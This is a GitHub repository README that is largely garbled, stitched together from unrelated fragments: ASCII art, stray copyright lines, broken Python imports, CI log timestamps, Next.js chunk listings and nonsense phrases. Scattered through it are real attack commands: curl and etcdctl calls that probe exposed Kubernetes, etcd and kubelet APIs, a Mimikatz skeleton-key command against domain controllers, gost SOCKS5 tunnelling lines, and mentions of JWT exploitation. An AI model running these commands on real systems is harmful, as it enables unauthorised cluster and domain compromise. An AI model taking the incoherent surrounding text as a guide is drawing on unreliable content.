Skip to content

TheProdigyLeague/NYSE_VRZN

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

42 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Virtual_Herizons

  ____     _ _       _              ____                  _               
/ ___|___| | |_ _| | __ _ _ __ / ___| ___ _ ____ _(_) ___ ___ ___
| | / _ \ | | | | | |/ _` | '__| \___ \ / _ \ '__\ \ / / |/ __/ _ \/ __|
| |__| __/ | | |_| | | (_| | | ___) | __/ | \ V /| | (_| __/\__ \
\____\___|_|_|\__,_|_|\__,_|_| |____/ \___|_| \_/ |_|\___\___||___/
  • (c) 2019 kazuya kawaguchi
  • (c) 2024 Zaxkeroth
  • (c) 2005, 2007 Bob Ippolito. All Rights Reserved.
  • (c) The Closure Library Authors.

SPDX-License-Identifier: MIT

import os
import sys
import m= b, tp, r:436 # bloat_code
$vendors-node-modules_-ba0e4d5b3207.js:15
$ls 
$cd
$forced reflow
[DOM] exceptions (in promise)
8:30, crash
2023-03-25T21:14:25.1705153Z ##[section]Starting: Prepare job test
2023-03-25T21:14:25.1707846Z Evaluating strategy
2023-03-25T21:14:25.1712696Z Creating job '__default'
2023-03-25T21:14:25.1715118Z Evaluating timeout
2023-03-25T21:14:25.1715190Z Evaluating cancel timeout
2023-03-25T21:14:25.1715228Z Evaluating continue on error
2023-03-25T21:14:25.1715272Z Evaluating target
2023-03-25T21:14:25.1717082Z ##[section]Finishing: Prepare job test
*弃用*
/_next/static/chunks/pages/%5BversionId%5D/%5BproductId%5D/%5B...restPage%5D-0a388d0202310049.js119B
/_next/static/xR23a7L8uutSe_4ww_xRn/_buildManifest.js76B
/_next/static/xR23a7L8uutSe_4ww_xRn/_ssgManifest.js74B
/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js73B
/_next/static/chunks/856-9ad78b8d852d1279.js67B
/_next/static/chunks/335-c28a1896766e22f6.js67B
/_next/static/chunks/377-db71c9ecf498e436.js67B
/_next/static/chunks/833-c07ccb17b9c4f763.js67B
/_next/static/chunks/584-0d3303dbd89ed456.js67B
/_next/static/chunks/200-76f833ab3eb14f10.js67B
[POST]
[VERIFICATION]
~

chrome crashing

$ _.ksend
this loop # china llc
[VIOLATION]
*这。无尽的。环形*
- Failed to construct clipboard
+ Blocked D  e  V  Tool Request 
[!] JWt API XPLOIT 
[!] JSON WEB token leakage

API addresses that (You) should know

(External network visibility)

cAdvisor

curl -k https://<IP Address>:4194

Insecure API server

curl -k https://<IP Address>:8080

Secure API Server

curl -k https://<IP Address>:(8|6)443/swaggerapi
curl -k https://<IP Address>:(8|6)443/healthz
curl -k https://<IP Address>:(8|6)443/api/v1

etcd API

curl -k https://<IP address>:2379
curl -k https://<IP address>:2379/version
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only

Kubelet API

curl -k https://<IP address>:10250
curl -k https://<IP address>:10250/metrics
curl -k https://<IP address>:10250/pods

kubelet (Read only)

curl -k https://<IP Address>:10255
http://<external-IP>:10255/pods
prompt -para
specif -user
psswrd -con
remote -host

AWS_SOCIALIST_MEDIUMS_PUPPETEERING

Skeleton Key

# Exploitation Command runned as DA:
>Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DCs FQDN>
# Access using the password "mimikatz"
[Enter]
$-PSSes
> Server side: gost -L=socks5://:1080
> Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true
[tpl, cName: Z4](https://www.theprodigyleague.github.io)
[subdomain](http://www.assetproductions.net)